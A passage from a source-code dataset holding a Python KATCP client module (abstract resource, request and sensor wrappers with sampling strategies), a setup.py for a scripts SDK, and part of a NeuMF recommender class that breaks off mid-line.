A complication\n involved with subclassing is that all the abstract properties must be\n implemented as properties; normal instance attributes cannot be used.\n\n Attributes\n ----------\n Apart from the abstract properties described below\n\n TODO Describe how hierarchies are implemented. Also all other descriptions\n here so that the sphinx doc can be auto-generated from here.\n\n \"\"\"\n\n def __init__(self):\n self._active = True\n\n @abc.abstractproperty\n def name(self):\n \"\"\"Name of this KATCP resource.\"\"\"\n\n @abc.abstractproperty\n def description(self):\n \"\"\"Description of this KATCP resource.\"\"\"\n\n @abc.abstractproperty\n def address(self):\n \"\"\"Address of the underlying client/device.\n\n Type: tuple(host, port) or None, with host a string and port an integer.\n\n If this KATCPResource is not associated with a specific KATCP device\n (e.g. it is only a top-level container for a hierarchy of KATCP\n resources), the address should be None.\n\n \"\"\"\n\n @abc.abstractproperty\n def is_connected(self):\n \"\"\"Indicate whether the underlying client/device is connected or not.\"\"\"\n\n @abc.abstractproperty\n def req(self):\n \"\"\"Attribute root/container for all KATCP request wrappers.\n\n Each KATCP request that is exposed on a KATCP device should have a\n corresponding :class:`KATCPRequest` object so that calling\n\n `resource.req.request_name(arg1, arg2, ...)`\n\n sends a '?request-name arg1 arg2 ...' message to the KATCP device and\n waits for the associated inform-reply and reply messages.\n\n For a :class:`KATCPResource` object that exposes a hierarchical device\n it can choose to include lower-level request handlers here such that\n `resource.req.dev_request()` maps to `resource.dev.req.request()`.\n\n \"\"\"\n\n @abc.abstractproperty\n def sensor(self):\n \"\"\"Attribute root/container for all KATCP sensor wrappers.\n\n Each KATCP sensor that is exposed on a KATCP device should have a\n corresponding :class:`KATCPSensor` object so that\n\n `resource.sensor.sensor_name`\n\n corresponds to a sensor named e.g. 'sensor-name', where the object or\n attribute name is an escaped/Pythonised version of the original sensor\n name (see :func:`escape_name` for the escape mechanism). Hopefully the\n device is not crazy enough to have multiple sensors that map to the\n same Python identifier.\n\n A :class:`KATCPResource` object that exposes a hierarchical device can\n choose to include lower-level sensors here such that\n `resource.sensor.dev_sensorname` maps to\n `resource.dev.sensor.sensorname`.\n\n \"\"\"\n\n @abc.abstractproperty\n def parent(self):\n \"\"\"Parent KATCPResource object of this subordinate resource, or None.\"\"\"\n\n @abc.abstractproperty\n def children(self):\n \"\"\"AttrDict of subordinate KATCPResource objects keyed by their names.\"\"\"\n\n @tornado.gen.coroutine\n def wait(self, sensor_name, condition_or_value, timeout=5):\n \"\"\"Wait for a sensor in this resource to satisfy a condition.\n\n Parameters\n ----------\n sensor_name : string\n The name of the sensor to check\n condition_or_value : obj or callable, or seq of objs or callables\n If obj, sensor.value is compared with obj. If callable,\n condition_or_value(reading) is called, and must return True if its\n condition is satisfied. 
Since the reading is passed in, the value,\n status, timestamp or received_timestamp attributes can all be used\n in the check.\n timeout : float or None\n The timeout in seconds (None means wait forever)\n\n Returns\n -------\n This command returns a tornado Future that resolves with True when the\n sensor value satisfies the condition, or False if the condition is\n still not satisfied after a given timeout period.\n\n Raises\n ------\n :class:`KATCPSensorError`\n If the sensor does not have a strategy set, or if the named sensor\n is not present\n\n \"\"\"\n sensor_name = escape_name(sensor_name)\n sensor = self.sensor[sensor_name]\n try:\n yield sensor.wait(condition_or_value, timeout)\n except tornado.gen.TimeoutError:\n raise tornado.gen.Return(False)\n else:\n raise tornado.gen.Return(True)\n\n @abc.abstractmethod\n def list_sensors(self, filter=\"\", strategy=False, status=\"\",\n use_python_identifiers=True, tuple=False, refresh=False):\n \"\"\"List sensors available on this resource matching certain criteria.\n\n Parameters\n ----------\n filter : string, optional\n Filter each returned sensor's name against this regexp if specified.\n To ease the dichotomy between Python identifier names and actual\n sensor names, the default is to search on Python identifier names\n rather than KATCP sensor names, unless `use_python_identifiers`\n below is set to False. Note that the sensors of subordinate\n KATCPResource instances may have inconsistent names and Python\n identifiers, better to always search on Python identifiers in this\n case.\n strategy : {False, True}, optional\n Only list sensors with a set strategy if True\n status : string, optional\n Filter each returned sensor's status against this regexp if given\n use_python_identifiers : {True, False}, optional\n Match on python identifiers even the the KATCP name is available.\n tuple : {True, False}, optional, Default: False\n Return backwards compatible tuple instead of SensorResultTuples\n refresh : {True, False}, optional, Default: False\n If set the sensor values will be refreshed with get_value before\n returning the results.\n\n Returns\n -------\n sensors : list of SensorResultTuples, or list of tuples\n List of matching sensors presented as named tuples. The `object`\n field is the :class:`KATCPSensor` object associated with the sensor.\n Note that the name of the object may not match `name` if it\n originates from a subordinate device.\n \"\"\"\n\n @tornado.gen.coroutine\n def set_sampling_strategies(self, filter, strategy_and_params):\n \"\"\"Set a sampling strategy for all sensors that match the specified filter.\n\n Parameters\n ----------\n filter : string\n The regular expression filter to use to select the sensors to which\n to apply the specified strategy. Use \"\" to match all sensors. Is\n matched using :meth:`list_sensors`.\n strategy_and_params : seq of str or str\n As tuple contains (, [, ...]) where the strategy\n names and parameters are as defined by the KATCP spec. 
As str contains the\n same elements in space-separated form.\n **list_sensor_args : keyword arguments\n Passed to the :meth:`list_sensors` call as kwargs\n\n Returns\n -------\n sensors_strategies : tornado Future\n resolves with a dict with the Python identifier names of the sensors\n as keys and the value a tuple:\n\n (success, info) with\n\n success : bool\n True if setting succeeded for this sensor, else False\n info : tuple\n normalised sensor strategy and parameters as tuple if success == True\n else, sys.exc_info() tuple for the error that occurred.\n \"\"\"\n sensors_strategies = {}\n sensor_results = yield self.list_sensors(filter)\n for sensor_reslt in sensor_results:\n norm_name = sensor_reslt.object.normalised_name\n try:\n sensor_strat = yield self.set_sampling_strategy(norm_name, strategy_and_params)\n sensors_strategies[norm_name] = sensor_strat[norm_name]\n except Exception:\n sensors_strategies[norm_name] = (\n False, sys.exc_info())\n raise tornado.gen.Return(sensors_strategies)\n\n @tornado.gen.coroutine\n def set_sampling_strategy(self, sensor_name, strategy_and_params):\n \"\"\"Set a sampling strategy for a specific sensor.\n\n Parameters\n ----------\n sensor_name : string\n The specific sensor.\n strategy_and_params : seq of str or str\n As tuple contains (, [, ...]) where the strategy\n names and parameters are as defined by the KATCP spec. As str contains the\n same elements in space-separated form.\n\n Returns\n -------\n sensors_strategies : tornado Future\n resolves with a dict with the Python identifier names of the sensors\n as keys and the value a tuple:\n\n (success, info) with\n\n success : bool\n True if setting succeeded for this sensor, else False\n info : tuple\n normalised sensor strategy and parameters as tuple if success == True\n else, sys.exc_info() tuple for the error that occurred.\n \"\"\"\n sensors_strategies = {}\n try:\n sensor_obj = self.sensor.get(sensor_name)\n yield sensor_obj.set_sampling_strategy(strategy_and_params)\n sensors_strategies[sensor_obj.normalised_name] = (\n True, sensor_obj.sampling_strategy)\n except Exception:\n sensors_strategies[sensor_obj.normalised_name] = (\n False, sys.exc_info())\n raise tornado.gen.Return(sensors_strategies)\n\n def set_active(self, active):\n self._active = bool(active)\n for child in dict.values(self.children):\n child.set_active(active)\n\n def is_active(self):\n return self._active\n\n\nclass KATCPRequest(with_metaclass(abc.ABCMeta, object)):\n\n \"\"\"Abstract Base class to serve as the definition of the KATCPRequest API.\n\n Wrapper around a specific KATCP request to a given KATCP device. Each\n available KATCP request for a particular device has an associated\n :class:`KATCPRequest` object in the object hierarchy. This wrapper is mainly\n for interactive convenience. 
It provides the KATCP request help string as a\n docstring and pretty-prints the result of the request.\n\n \"\"\"\n\n def __init__(self, request_description, is_active=lambda: True):\n \"\"\"Initialize request with given description and network client\n\n Parameters\n ----------\n request_description : dict\n name : str\n KATCP name of the request\n description : str\n KATCP request description (as returned by ?help )\n timeout_hint : float or None\n Request timeout suggested by device or None if not provided\n is_active : callable, optional\n Returns True if this request is active, else False\n\n \"\"\"\n for required_description_key in ('name', 'description', 'timeout_hint'):\n if required_description_key not in request_description:\n raise ValueError(\n 'Required request_description key {!r} not present'\n .format(required_description_key))\n self._request_description = dict(request_description)\n self.__doc__ = '\\n'.join(('KATCP Documentation',\n '===================',\n self.description,\n 'KATCPRequest Documentation',\n '==========================',\n self.__doc__ or ''))\n self._is_active = is_active\n\n @property\n def name(self):\n \"\"\"Name of the KATCP request.\"\"\"\n return self._request_description['name']\n\n @property\n def description(self):\n \"\"\"Description of KATCP request as obtained from the ?help request.\"\"\"\n return self._request_description['description']\n\n @property\n def timeout_hint(self):\n \"\"\"Request timeout suggested by device or None if not provided\"\"\"\n return self._request_description['timeout_hint']\n\n\n def __call__(self, *args, **kwargs):\n \"\"\"Execute the KATCP request described by this object.\n\n All positional arguments of this function are converted to KATCP string\n representations and passed on as space-separated parameters to the KATCP\n device.\n\n Keyword Arguments\n -----------------\n timeout : None or float, optional\n Timeout in seconds for the request. If None, use request timeout\n hint received from server or default for the :class:`KATCPResource`\n instance that contains the request if no hint is available.\n mid : None or int, optional\n Message identifier to use for the request message. 
If None, use\n either auto-incrementing value or no mid depending on the KATCP\n protocol version (mid's were only introduced with KATCP v5) and the\n default of the containing :class:`KATCPResource` instance.\n\n Returns\n -------\n reply : tornado future resolving with :class:`KATCPReply` object\n KATCP request reply wrapped in KATCPReply object\n\n Raises\n ------\n :class:`ResourceInactive` if the resource is inactive when the request is made.\n \"\"\"\n if self.is_active():\n return self.issue_request(*args, **kwargs)\n else:\n raise KATCPResourceInactive(\n \"Can't make ?{} request; resource is inactive\".format(self.name))\n\n @abc.abstractmethod\n def issue_request(self, *args, **kwargs):\n \"\"\"Signature as for __call__\n\n Do the request immediately without checking active state.\n \"\"\"\n\n def is_active(self):\n \"\"\"True if resource for this request is active\"\"\"\n return self._is_active()\n\nclass KATCPDummyRequest(KATCPRequest):\n \"\"\"Dummy counterpart to KATCPRequest that always returns a successful reply\"\"\"\n def issue_request(self, *args, **kwargs):\n reply_msg = Message.reply('fake', 'ok')\n reply = KATCPReply(reply_msg, [])\n fut = Future()\n fut.set_result(reply)\n return fut\n\nclass KATCPSensorReading(collections.namedtuple(\n 'KATCPSensorReading', 'received_timestamp timestamp istatus value')):\n\n \"\"\"Sensor reading as a (received_timestamp, timestamp, istatus, value) tuple.\n\n Attributes\n ----------\n received_timestamp : float\n Time (in seconds since UTC epoch) at which the sensor value was received.\n timestamp : float\n Time (in seconds since UTC epoch) at which the sensor value was determined.\n istatus : int Sensor status constant\n Whether the value represents an error condition or not, as in class:`katcp.Sensor`\n The status is stored as an int, but output as a string, eg 'nominal'.\n value : object\n The value of the sensor (the type will be appropriate to the\n sensor's type).\n \"\"\"\n\n __slots__ = [] # Prevent dynamic attributes\n\n @property\n def status(self):\n \" Returns the string representation of sensor status, eg 'nominal'\"\n try:\n return Sensor.STATUSES[int(self.istatus)]\n except TypeError:\n return 'unknown'\n\n\nclass KATCPSensorsManager(with_metaclass(abc.ABCMeta, object)):\n\n \"\"\"Sensor management class used by KATCPSensor. Abstracts communications details.\n\n This class should arrange:\n\n 1. A mechanism for setting sensor strategies\n 2. A mechanism for polling a sensor value\n 3. Keeping track of- and reapplying sensor strategies after reconnect, etc.\n 4. Providing local time. 
This is doing to avoid direct calls to time.time, allowing\n accelerated time testing / simulation / dry-running\n \"\"\"\n\n @abc.abstractmethod\n def time(self):\n \"\"\"Returns the current time (in seconds since UTC epoch)\"\"\"\n\n @abc.abstractmethod\n def get_sampling_strategy(self, sensor_name):\n \"\"\"Get the current sampling strategy for the named sensor\n\n Parameters\n ----------\n\n sensor_name : str\n Name of the sensor (normal or escaped form)\n\n Returns\n -------\n\n strategy : tornado Future that resolves with tuple of str\n contains (, [, ...]) where the strategy names and\n parameters are as defined by the KATCP spec\n \"\"\"\n\n @abc.abstractmethod\n def set_sampling_strategy(self, sensor_name, strategy_and_parms):\n \"\"\"Set the sampling strategy for the named sensor\n\n Parameters\n ----------\n\n sensor_name : str\n Name of the sensor\n strategy : seq of str or str\n As tuple contains (, [, ...]) where the strategy\n names and parameters are as defined by the KATCP spec. As str contains the\n same elements in space-separated form.\n\n Returns\n -------\n\n done : tornado Future that resolves when done or raises KATCPSensorError\n\n Notes\n -----\n\n It is recommended that implementations use :func:`normalize_strategy_parameters`\n to process the strategy_and_parms parameter, since it will deal with both string\n and list versions and makes sure that numbers are represented as strings in a\n consistent format.\n\n This method should arrange for the strategy to be set on the underlying network\n device or whatever other implementation is used. This strategy should also be\n automatically re-set if the device is reconnected, etc. If a strategy is set for a\n non-existing sensor, it should still cache the strategy and ensure that is applied\n whenever said sensor comes into existence. This allows an applications to pre-set\n strategies for sensors before synced / connected to a device.\n\n \"\"\"\n\n @abc.abstractmethod\n def drop_sampling_strategy(self, sensor_name):\n \"\"\"Drop the sampling strategy for the named sensor from the cache\n\n Calling :meth:`set_sampling_strategy` requires the sensor manager to\n memorise the requested strategy so that it can automatically be reapplied.\n If the client is no longer interested in the sensor, or knows the sensor\n may be removed from the server, then it can use this method to ensure the\n manager forgets about the strategy. This method will not change the current\n strategy. No error is raised if there is no strategy to drop.\n\n Parameters\n ----------\n\n sensor_name : str\n Name of the sensor (normal or escaped form)\n\n \"\"\"\n\n @abc.abstractmethod\n def poll_sensor(self, sensor_name):\n \"\"\"Poll sensor and arrange for sensor object to be updated\n\n Returns\n -------\n\n done_future : tornado Future\n Resolves when the poll is complete, or raises KATCPSensorError\n \"\"\"\n # TODO NM 2015-02-03 Might want to add a timeout parameter here, and to all the\n # other code that calls this\n\n @abc.abstractmethod\n def reapply_sampling_strategies(self):\n \"\"\"Reapply all sensor strategies using cached values\n\n Would typically be called when a connection is re-established. 
Should\n not raise errors when resetting strategies for sensors that no longer\n exist on the KATCP resource.\n \"\"\"\n\n\nclass KATCPSensor(with_metaclass(abc.ABCMeta, object)):\n \"\"\"Wrapper around a specific KATCP sensor on a given KATCP device.\n\n Each available KATCP sensor for a particular device has an associated\n :class:`KATCPSensor` object in the object hierarchy. This wrapper is mainly\n for interactive convenience. It provides the KATCP request help string as a\n docstring and registers listeners. Subclasses need to call the base class\n version of __init__().\n \"\"\"\n\n def __init__(self, sensor_description, sensor_manager):\n \"\"\"Subclasses must arrange to call this in their __init__().\n\n Parameters\n ----------\n sensor_description : dict\n Description of the KATCP sensor, with keys same as the parameters of\n :class:`katcp.Sensor`\n sensor_manager : :class:`KATCPSensorsManager` instance\n Manages sensor strategies, allows sensor polling, and provides time\n \"\"\"\n self._manager = sensor_manager\n self.clear_listeners()\n self._reading = KATCPSensorReading(0, 0, Sensor.UNKNOWN, None)\n # We'll be abusing a katcp.Sensor object slightly to make use of its\n # parsing and formatting functionality\n self._sensor = Sensor(**sensor_description)\n self._name = self._sensor.name\n # Overide the katpc.Sensor's set method with ours\n self._sensor.set = self.set\n # Steal the the katcp.Sensor's set_formatted method. Since we overrode\n # its set() method with ours, calling set_formatted will result in this\n # KATCPSensor object's value being set.\n self.set_formatted = self._sensor.set_formatted\n\n @property\n def parent_name(self):\n \"\"\"Name of the parent of this KATCPSensor\"\"\"\n return self._manager.resource_name\n\n @property\n def name(self):\n \"\"\"Name of this KATCPSensor\"\"\"\n return self._name\n\n @property\n def normalised_name(self):\n \"\"\"Normalised name of this KATCPSensor that can be used as a python identifier\"\"\"\n return escape_name(self._name)\n\n @property\n def reading(self):\n \"\"\"Most recently received sensor reading as KATCPSensorReading instance\"\"\"\n return self._reading\n\n @property\n def value(self):\n return self._reading.value\n\n @property\n def status(self):\n return self._reading.status\n\n @property\n def sampling_strategy(self):\n \"\"\"Current sampling strategy\"\"\"\n return self._manager.get_sampling_strategy(self.name)\n\n @property\n def description(self):\n return self._sensor.description\n\n @property\n def units(self):\n return self._sensor.units\n\n @property\n def type(self):\n return self._sensor.type\n\n def parse_value(self, s_value):\n \"\"\"Parse a value from a string.\n\n Parameters\n ----------\n s_value : str\n A string value to attempt to convert to a value for\n the sensor.\n\n Returns\n -------\n value : object\n A value of a type appropriate to the sensor.\n\n \"\"\"\n return self._sensor.parse_value(s_value)\n\n def set_strategy(self, strategy, params=None):\n \"\"\"Set current sampling strategy for sensor.\n Add this footprint for backwards compatibility.\n\n Parameters\n ----------\n\n strategy : seq of str or str\n As tuple contains (, [, ...]) where the strategy\n names and parameters are as defined by the KATCP spec. 
As str contains the\n same elements in space-separated form.\n params : seq of str or str\n (, [, ...])\n\n Returns\n -------\n done : tornado Future that resolves when done or raises KATCPSensorError\n\n \"\"\"\n if not params:\n param_args = []\n elif isinstance(params, basestring):\n param_args = [str(p) for p in params.split(' ')]\n else:\n if not isinstance(params, collections.Iterable):\n params = (params,)\n param_args = [str(p) for p in params]\n samp_strategy = \" \".join([strategy] + param_args)\n return self._manager.set_sampling_strategy(self.name, samp_strategy)\n\n def set_sampling_strategy(self, strategy):\n \"\"\"Set current sampling strategy for sensor\n\n Parameters\n ----------\n\n strategy : seq of str or str\n As tuple contains (, [, ...]) where the strategy\n names and parameters are as defined by the KATCP spec. As str contains the\n same elements in space-separated form.\n\n Returns\n -------\n done : tornado Future that resolves when done or raises KATCPSensorError\n\n \"\"\"\n return self._manager.set_sampling_strategy(self.name, strategy)\n\n def drop_sampling_strategy(self):\n \"\"\"Drop memorised sampling strategy for sensor, if any\n\n Calling this method ensures that the sensor manager does not attempt\n to reapply a sampling strategy. It will not raise an error if no strategy\n has been set. Use :meth:`set_sampling_strategy` to memorise a strategy again.\n \"\"\"\n self._manager.drop_sampling_strategy(self.name)\n\n def register_listener(self, listener, reading=False):\n \"\"\"Add a callback function that is called when sensor value is updated.\n\n The callback footprint is received_timestamp, timestamp, status, value.\n\n Parameters\n ----------\n listener : function\n Callback signature: if reading listener(katcp_sensor, reading) where\n `katcp_sensor` is this KATCPSensor instance `reading` is an instance of\n :class:`KATCPSensorReading`.\n\n Callback signature: default, if not reading listener(received_timestamp,\n timestamp, status, value)\n \"\"\"\n listener_id = hashable_identity(listener)\n self._listeners[listener_id] = (listener, reading)\n logger.debug(\n 'Register listener for {}'\n .format(self.name))\n\n def unregister_listener(self, listener):\n \"\"\"Remove a listener callback added with register_listener().\n\n Parameters\n ----------\n listener : function\n Reference to the callback function that should be removed\n\n \"\"\"\n listener_id = hashable_identity(listener)\n self._listeners.pop(listener_id, None)\n\n def is_listener(self, listener):\n listener_id = hashable_identity(listener)\n return listener_id in self._listeners\n\n def clear_listeners(self):\n \"\"\"Clear any registered listeners to updates from this sensor.\"\"\"\n self._listeners = {}\n\n def call_listeners(self, reading):\n logger.debug(\n 'Calling listeners {}'\n .format(self.name))\n for listener, use_reading in list(self._listeners.values()):\n try:\n if use_reading:\n listener(self, reading)\n else:\n listener(reading.received_timestamp, reading.timestamp,\n reading.status, reading.value)\n except Exception:\n logger.exception(\n 'Unhandled exception calling KATCPSensor callback {0!r}'\n .format(listener))\n\n def set(self, timestamp, status, value):\n \"\"\"Set sensor with a given received value, matches :meth:`katcp.Sensor.set`\"\"\"\n received_timestamp = self._manager.time()\n reading = KATCPSensorReading(received_timestamp, timestamp, status, value)\n self._reading = reading\n self.call_listeners(reading)\n\n def set_value(self, value, status=Sensor.NOMINAL, 
timestamp=None):\n \"\"\"Set sensor value with optinal specification of status and timestamp\"\"\"\n if timestamp is None:\n timestamp = self._manager.time()\n self.set(timestamp, status, value)\n\n def set_formatted(self, raw_timestamp, raw_status, raw_value, major):\n \"\"\"Set sensor using KATCP string formatted inputs\n\n Mirrors :meth:`katcp.Sensor.set_formatted`.\n\n This implementation is empty. Will, during instantiation, be overridden by the\n set_formatted() method of a katcp.Sensor object.\n \"\"\"\n\n @tornado.gen.coroutine\n def get_reading(self):\n \"\"\"Get a fresh sensor reading from the KATCP resource\n\n Returns\n -------\n reply : tornado Future resolving with :class:`KATCPSensorReading` object\n\n Notes\n -----\n\n As a side-effect this will update the reading stored in this object, and result in\n registered listeners being called.\n \"\"\"\n yield self._manager.poll_sensor(self._name)\n # By now the sensor manager should have set the reading\n raise Return(self._reading)\n\n @tornado.gen.coroutine\n def get_value(self):\n \"\"\"Get a fresh sensor value from the KATCP resource\n\n Returns\n -------\n reply : tornado Future resolving with :class:`KATCPSensorReading` object\n\n Notes\n -----\n\n As a side-effect this will update the reading stored in this object, and result in\n registered listeners being called.\n \"\"\"\n yield self._manager.poll_sensor(self._name)\n # By now the sensor manager should have set the reading\n raise Return(self._reading.value)\n\n @tornado.gen.coroutine\n def get_status(self):\n \"\"\"Get a fresh sensor status from the KATCP resource\n\n Returns\n -------\n reply : tornado Future resolving with :class:`KATCPSensorReading` object\n\n Notes\n -----\n\n As a side-effect this will update the reading stored in this object, and result in\n registered listeners being called.\n \"\"\"\n yield self._manager.poll_sensor(self._name)\n # By now the sensor manager should have set the reading\n raise Return(self._reading.status)\n\n def wait(self, condition_or_value, timeout=None):\n \"\"\"Wait for the sensor to satisfy a condition.\n\n Parameters\n ----------\n condition_or_value : obj or callable, or seq of objs or callables\n If obj, sensor.value is compared with obj. If callable,\n condition_or_value(reading) is called, and must return True if its\n condition is satisfied. Since the reading is passed in, the value,\n status, timestamp or received_timestamp attributes can all be used\n in the check.\n TODO: Sequences of conditions (use SensorTransitionWaiter thingum?)\n timeout : float or None\n The timeout in seconds (None means wait forever)\n\n Returns\n -------\n This command returns a tornado Future that resolves with True when the\n sensor value satisfies the condition. 
It will never resolve with False;\n if a timeout is given a TimeoutError happens instead.\n\n Raises\n ------\n :class:`KATCPSensorError`\n If the sensor does not have a strategy set\n :class:`tornado.gen.TimeoutError`\n If the sensor condition still fails after a stated timeout period\n\n \"\"\"\n if (isinstance(condition_or_value, collections.Sequence) and not\n isinstance(condition_or_value, basestring)):\n raise NotImplementedError(\n 'Currently only single conditions are supported')\n condition_test = (condition_or_value if callable(condition_or_value)\n else lambda s: s.value == condition_or_value)\n\n ioloop = tornado.ioloop.IOLoop.current()\n f = Future()\n if self.sampling_strategy == ('none', ):\n raise KATCPSensorError(\n 'Cannot wait on a sensor that does not have a strategy set')\n\n def handle_update(sensor, reading):\n # This handler is called whenever a sensor update is received\n try:\n assert sensor is self\n if condition_test(reading):\n self.unregister_listener(handle_update)\n # Try and be idempotent if called multiple times after the\n # condition is matched. This should not happen unless the\n # sensor object is being updated in a thread outside of the\n # ioloop.\n if not f.done():\n ioloop.add_callback(f.set_result, True)\n except Exception:\n f.set_exc_info(sys.exc_info())\n self.unregister_listener(handle_update)\n\n self.register_listener(handle_update, reading=True)\n # Handle case where sensor is already at the desired value\n ioloop.add_callback(handle_update, self, self._reading)\n\n if timeout:\n to = ioloop.time() + timeout\n timeout_f = with_timeout(to, f)\n # Make sure we stop listening if the wait times out to prevent a\n # buildup of listeners\n timeout_f.add_done_callback(\n lambda f: self.unregister_listener(handle_update))\n return timeout_f\n else:\n return f\n\n\n_KATCPReplyTuple = collections.namedtuple('_KATCPReplyTuple', 'reply informs')\n\n\nclass KATCPReply(_KATCPReplyTuple):\n \"\"\"Container for return messages of KATCP request (reply and informs).\n\n This is based on a named tuple with 'reply' and 'informs' fields so that\n the :class:`KATCPReply` object can still be unpacked into a normal tuple.\n\n Parameters\n ----------\n reply : :class:`katcp.Message` object\n Reply message returned by katcp request\n informs : list of :class:`katcp.Message` objects\n List of inform messages returned by KATCP request\n\n Attributes\n ----------\n messages: list of :class:`katcp.Message` objects\n List of all messages returned by KATCP request, reply first\n reply: :class:`katcp.Message` object\n Reply message returned by KATCP request\n informs: list of :class:`katcp.Message` objects\n List of inform messages returned by KATCP request\n\n The instance evaluates to nonzero (i.e. truthy) if the request succeeded.\n\n \"\"\"\n\n __slots__ = [] # Prevent dynamic attributes from being possible\n\n def __repr__(self):\n \"\"\"String representation for pretty-printing in IPython.\"\"\"\n return \"\\n\".join(\n \"%s%s %s\"\n % (\n ensure_native_str(Message.TYPE_SYMBOLS[m.mtype]),\n m.name,\n \" \".join([ensure_native_str(arg) for arg in m.arguments]),\n )\n for m in self.messages\n )\n\n def __str__(self):\n \"\"\"String representation using KATCP wire format\"\"\"\n return '\\n'.join(str(m) for m in self.messages)\n\n def __bool__(self):\n \"\"\"True if request succeeded (i.e. 
first reply argument is 'ok').\"\"\"\n return self.messages[0].reply_ok()\n\n if PY2:\n __nonzero__ = __bool__\n\n @property\n def messages(self):\n \"\"\"List of all messages returned by KATCP request, reply first.\"\"\"\n return [self.reply] + self.informs\n\n @property\n def succeeded(self):\n \"\"\"True if request succeeded (i.e. first reply argument is 'ok').\"\"\"\n return bool(self)\n"} {"ext": "py", "sha": "1a2ee45e0d3505c7a62e3d84edae917cc0417cd5", "content": "#!/usr/bin/env python\nfrom os import path\n\nimport setuptools\n\n\ndef parse_requirements(filename):\n \"\"\" load requirements from a pip requirements file \"\"\"\n lineiter = (line.strip() for line in open(filename))\n return [line for line in lineiter if line and not line.startswith(\"#\")]\n\n\nfrom metaappscriptsdk import info\n\nhere = path.abspath(path.dirname(__file__))\n\n# Get the long description from the README file\nwith open(path.join(here, 'README.rst')) as f:\n long_description = f.read()\n\npackages = [\n 'metaappscriptsdk',\n 'metaappscriptsdk.logger',\n 'metaappscriptsdk.services',\n 'metaappscriptsdk.schedule',\n 'metaappscriptsdk.feed',\n]\n\ninstall_reqs = parse_requirements('requirements.txt')\nreqs = install_reqs\n\nsetuptools.setup(\n name=info.__package_name__,\n version=info.__version__,\n\n description='Meta App Scripts SDK',\n long_description=long_description,\n\n url='https://github.com/rw-meta/meta-app-script-py-sdk',\n\n author='Artur Geraschenko',\n author_email='arturgspb@gmail.com',\n\n license='MIT',\n\n classifiers=[\n 'Programming Language :: Python :: 3'\n ],\n install_requires=reqs,\n packages=packages,\n package_data={'': ['LICENSE']},\n package_dir={'metaappscriptsdk': 'metaappscriptsdk'},\n include_package_data=True,\n)\n"} {"ext": "py", "sha": "1a2ee540ef6781291803a80a80f59af0ef0156d2", "content": "\"\"\"\nModule description:\n\n\"\"\"\n\n__version__ = '0.1'\n__author__ = 'Vito Walter Anelli, Claudio Pomo'\n__email__ = 'vitowalter.anelli@poliba.it, claudio.pomo@poliba.it'\n\nimport numpy as np\nfrom ast import literal_eval as make_tuple\nfrom tqdm import tqdm\n\nfrom elliot.dataset.samplers import pointwise_pos_neg_sampler as pws\nfrom elliot.recommender.neural.NeuMF.neural_matrix_factorization_model import NeuralMatrixFactorizationModel\nfrom elliot.recommender.recommender_utils_mixin import RecMixin\nfrom elliot.utils.write import store_recommendation\n\nfrom elliot.recommender.base_recommender_model import BaseRecommenderModel\nfrom elliot.recommender.base_recommender_model import init_charger\n\nnp.random.seed(42)\n\n\nclass NeuMF(RecMixin, BaseRecommenderModel):\n r\"\"\"\n Neural Collaborative Filtering\n\n For further details, please refer to the `paper `_\n\n Args:\n mf_factors: Number of MF latent factors\n mlp_factors: Number of MLP latent factors\n mlp_hidden_size: List of units for each layer\n lr: Learning rate\n dropout: Dropout rate\n is_mf_train: Whether to train the MF embeddings\n is_mlp_train: Whether to train the MLP layers\n\n To include the recommendation model, add it to the config file adopting the following pattern:\n\n .. 
code:: yaml\n\n models:\n NeuMF:\n meta:\n save_recs: True\n epochs: 10\n mf_factors: 10\n mlp_factors: 10\n mlp_hidden_size: (64,32)\n lr: 0.001\n dropout: 0.0\n is_mf_train: True\n is_mlp_train: True\n \"\"\"\n @init_charger\n def __init__(self, data, config, params, *args, **kwargs):\n\n self._random = np.random\n\n self._sampler = pws.Sampler(self._data.i_train_dict)\n\n self._params_list = [\n (\"_learning_rate\", \"lr\", \"lr\", 0.001, None, None),\n (\"_mf_factors\", \"mf_factors\", \"mffactors\", 10, int, None),\n (\"_mlp_factors\", \"mlp_factors\", \"mlpfactors\", 10, int, None),\n (\"_mlp_hidden_size\", \"mlp_hidden_size\", \"mlpunits\", \"(64,32)\", lambda x: list(make_tuple(str(x))), lambda x: self._batch_remove(str(x), \" []\").replace(\",\", \"-\")),\n (\"_dropout\", \"dropout\", \"drop\", 0, None, None),\n (\"_is_mf_train\", \"is_mf_train\", \"mftrain\", True, None, None),\n (\"_is_mlp_train\", \"is_mlp_train\", \"mlptrain\", True, None, None),\n ]\n self.autoset_params()\n\n if self._batch_size < 1:\n self._batch_size = self._data.transactions\n\n self._ratings = self._data.train_dict\n self._sp_i_train = self._data.sp_i_train\n self._i_items_set = list(range(self._num_items))\n\n self._model = NeuralMatrixFactorizationModel(self._num_users, self._num_items, self._mf_factors,\n self._mlp_factors, self._mlp_hidden_size,\n self._dropout, self._is_mf_train, self._is_mlp_train,\n self._learning_rate)\n\n @property\n def name(self):\n return \"NeuMF\"\\\n + \"_e:\" + str(self._epochs) \\\n + \"_bs:\" + str(self._batch_size) \\\n + f\"_{self.get_params_shortcut()}\"\n\n def train(self):\n if self._restore:\n return self.restore_weights()\n\n best_metric_value = 0\n\n for it in range(self._epochs):\n loss = 0\n steps = 0\n with tqdm(total=int(self._data.transactions // self._batch_size), disable=not self._verbose) as t:\n for batch in self._sampler.step(self._data.transactions, self._batch_size):\n steps += 1\n loss += self._model.train_step(batch)\n t.set_postfix({'loss': f'{loss.numpy() / steps:.5f}'})\n t.update()\n\n if not (it + 1) % self._validation_rate:\n recs = self.get_recommendations(self.evaluator.get_needed_recommendations())\n result_dict = self.evaluator.eval(recs)\n self._results.append(result_dict)\n\n print(f'Epoch {(it + 1)}/{self._epochs} loss {loss/steps:.5f}')\n\n if self._results[-1][self._validation_k][\"val_results\"][self._validation_metric] > best_metric_value:\n print(\"******************************************\")\n best_metric_value = self._results[-1][self._validation_k][\"val_results\"][self._validation_metric]\n if self._save_weights:\n self._model.save_weights(self._saving_filepath)\n if self._save_recs:\n store_recommendation(recs, self._config.path_output_rec_result + f\"{self.name}-it:{it + 1}.tsv\")\n\n def get_recommendations(self, k: int = 100):\n predictions_top_k = {}\n for index, offset in enumerate(range(0, self._num_users, self._batch_size)):\n offset_stop = min(offset + self._batch_size, self._num_users)\n predictions = self._model.get_recs(\n (\n np.repeat(np.array(list(range(offset, offset_stop)))[:, None], repeats=self._num_items, axis=1),\n np.array([self._i_items_set for _ in range(offset, offset_stop)])\n )\n )\n v, i = self._model.get_top_k(predictions, self.get_train_mask(offset, offset_stop), k=k)\n items_ratings_pair = [list(zip(map(self._data.private_items.get, u_list[0]), 